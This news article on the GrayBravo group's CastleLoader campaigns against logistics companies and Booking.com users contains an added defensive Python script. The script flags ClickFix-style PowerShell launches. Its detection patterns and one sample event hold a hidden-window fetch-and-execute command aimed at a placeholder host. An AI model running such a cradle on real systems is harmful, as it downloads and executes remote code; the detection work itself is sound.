CastleLoader PhaaS: GrayBravo Escalates Attacks on Logistics & Booking.com
The cybercriminal group GrayBravo, formerly known as TAG-150, continues to evolve at a rapid pace, demonstrating a high degree of technical sophistication, operational flexibility, and an ability to scale its infrastructure. A new investigation by Recorded Future has identified four independent clusters of malicious activity built around the multifunctional CastleLoader, reinforcing the assessment that GrayBravo operates under a subscription-based malware-as-a-service model.
One such cluster, tracked as TAG-160, primarily targets logistics companies. The attackers impersonate well-known carriers and conduct phishing campaigns using forged documents and links crafted with the ClickFix technique.
Victims receive messages purporting to come from companies such as England Logistics, urging them to open a link to confirm freight pricing. Following the link leads to a counterfeit page that instructs users to perform a sequence of actions, ultimately resulting in the covert download and execution of malware. In addition to CastleLoader, payloads observed in these attacks include HijackLoader, Rhadamanthys, and zgRAT.
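The ClickFix chain described above ends with the victim pasting and running a command that fetches and executes the loader, and that step leaves a distinctive trace in endpoint telemetry: a script interpreter spawned directly from the shell (the Win+R Run dialog is a child of explorer.exe) with a command line that contains a remote fetch or hidden-window flags. The following triage logic, added here as an example and not taken from the Recorded Future report or from any GrayBravo tooling, scores process-creation events for that combination. It assumes Sysmon-like Event ID 1 records flattened into dicts with the fields `Computer`, `User`, `Image`, `ParentImage` and `CommandLine`; the sample events are constructed, and the hostnames and URL are placeholders.

```python
"""Flag ClickFix-style executions in process-creation telemetry.

Added example for this article (not Recorded Future's or GrayBravo's code).
Assumes Sysmon-like Event ID 1 records flattened into dicts with the fields
Computer, User, Image, ParentImage and CommandLine. Sample events below are
constructed for illustration; hostnames and the URL are placeholders.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Interpreters a lure typically tells the victim to run by pasting a command.
INTERPRETERS = (
    "powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe",
    "wscript.exe", "cscript.exe", "curl.exe", "certutil.exe",
)

# Each pattern is one reason to suspect a download cradle or hidden execution.
CRADLE_PATTERNS = [
    re.compile(r"https?://", re.I),                                   # remote resource
    re.compile(r"\b(iwr|irm|invoke-webrequest|invoke-restmethod|"
               r"downloadstring|downloadfile)\b", re.I),              # fetch primitives
    re.compile(r"-(w|window|windowstyle)\s+hidden", re.I),            # hide the window
    re.compile(r"-(e|ec|enc|encodedcommand)\b", re.I),                # encoded payload
    re.compile(r"\b(iex|invoke-expression)\b", re.I),                 # execute fetched text
]


@dataclass
class Finding:
    host: str
    user: str
    score: int
    reasons: List[str]


def _basename(path: str) -> str:
    """Return the lowercase file name of a Windows path (or bare name)."""
    return path.lower().rsplit("\\", 1)[-1]


def score_event(ev: Dict[str, str]) -> Optional[Finding]:
    """Return a Finding when an interpreter launch looks like a pasted ClickFix command.

    A single reason (for example an admin opening PowerShell from the Start menu)
    is not enough; two or more independent reasons are required.
    """
    image = _basename(ev.get("Image", ""))
    if image not in INTERPRETERS:
        return None
    reasons: List[str] = []
    # The Run dialog launches its command as a child of explorer.exe, which is
    # the hallmark of a user following "press Win+R, paste, Enter" instructions.
    if _basename(ev.get("ParentImage", "")) == "explorer.exe":
        reasons.append("interpreter spawned from explorer.exe (Run dialog / shell)")
    cmd = ev.get("CommandLine", "")
    for pat in CRADLE_PATTERNS:
        if pat.search(cmd):
            reasons.append(f"command line matches /{pat.pattern}/")
    if len(reasons) < 2:
        return None
    return Finding(ev.get("Computer", "?"), ev.get("User", "?"), len(reasons), reasons)


def triage(events: List[Dict[str, str]]) -> List[Finding]:
    """Run score_event over a batch of events and keep only the hits."""
    hits = []
    for ev in events:
        finding = score_event(ev)
        if finding is not None:
            hits.append(finding)
    return hits


# Constructed sample telemetry: one benign interactive launch, one ClickFix-like
# launch, one scheduled script and one non-interpreter process.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"Computer": "WS-LOGISTICS-03", "User": "CORP\\dispatcher",
     "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "ParentImage": "C:\\Windows\\explorer.exe",
     "CommandLine": "powershell.exe"},
    {"Computer": "WS-LOGISTICS-07", "User": "CORP\\broker",
     "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "ParentImage": "C:\\Windows\\explorer.exe",
     "CommandLine": 'powershell -w hidden -c "irm https://lure.example/verify | iex"'},
    {"Computer": "SRV-BACKUP-01", "User": "CORP\\svc_backup",
     "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "ParentImage": "C:\\Windows\\System32\\cmd.exe",
     "CommandLine": "powershell -File C:\\scripts\\backup.ps1"},
    {"Computer": "WS-LOGISTICS-03", "User": "CORP\\dispatcher",
     "Image": "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe",
     "ParentImage": "C:\\Windows\\explorer.exe",
     "CommandLine": "chrome.exe https://example.com/"},
]


if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f"{f.host} {f.user} score={f.score}")
        for r in f.reasons:
            print("  -", r)
```

On the constructed sample only the second event is reported (score 5: explorer.exe parent plus four command-line patterns); the plain interactive PowerShell launch scores 1 and is suppressed. In production the same logic can be fed from an EDR or SIEM export, and the threshold and pattern list should be tuned against the environment's own baseline of administrative PowerShell use.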
To enhance credibility, the operators leverage compromised accounts and domains previously associated with legitimate businesses. They also create fraudulent profiles on logistics platforms such as DAT Freight & Analytics and Loadlink Technologies, enabling them to harvest contact details of potential victims, craft phishing lures based on authentic logistics data, and potentially even post fake freight listings embedded with malicious links.
A second cluster, designated TAG-161, exploits the recognizable Booking.com brand. These campaigns not only distribute CastleLoader but also deploy the Matanbuchus malware, a loader designed to retrieve additional malicious components. The cluster’s infrastructure is directly controlled by the attackers and includes proprietary tools for mass phishing distribution and redirect generation. These systems allow emails to be sent from compromised SMTP servers and route victims to infected websites masquerading as legitimate accommodation booking services.
The involvement of underground forum users adds further depth to the investigation. One alias, “Sparja,” is believed to have ties to CastleLoader. Analysts noted a malware control panel that displayed the name Sparja in place of a standard identifier. This individual has previously shown interest in loader development and discussed defense-evasion techniques within illicit communities. The timing of this activity aligns closely with CastleLoader’s emergence, suggesting possible involvement in its development or dissemination.
GrayBravo’s operations extend well beyond isolated campaigns and continue to broaden in scope. CastleLoader is delivered not only via phishing emails but also through fake software updates hosted on spoofed websites designed to mimic legitimate services. In one case, attackers impersonated downloads of the Zabbix administration platform to distribute the NetSupport RAT.
Although there are no public advertisements offering services, the consistent use of CastleLoader, the diversity of secondary payloads, and the presence of dedicated management panels strongly indicate a service-based operating model. Most infrastructure components—including control panels and command servers—communicate exclusively within a closed ecosystem, with access granted to a limited number of external parties, likely partners or tenants.
Confirmed infections in the United States and activity linked to educational institutions highlight both the geographic breadth of victims and the adaptability of the attackers’ tactics. In some cases, victims appear to have connected to malicious infrastructure via campus Wi-Fi networks, complicating efforts to accurately assess the scale of compromise.
As adoption of CastleLoader grows and new malicious tools are integrated, GrayBravo is poised to further entrench itself within the cybercriminal landscape. The group continues to refine its delivery mechanisms, evasion techniques, and command-and-control capabilities, underscoring its capacity for sustained and increasingly sophisticated operations.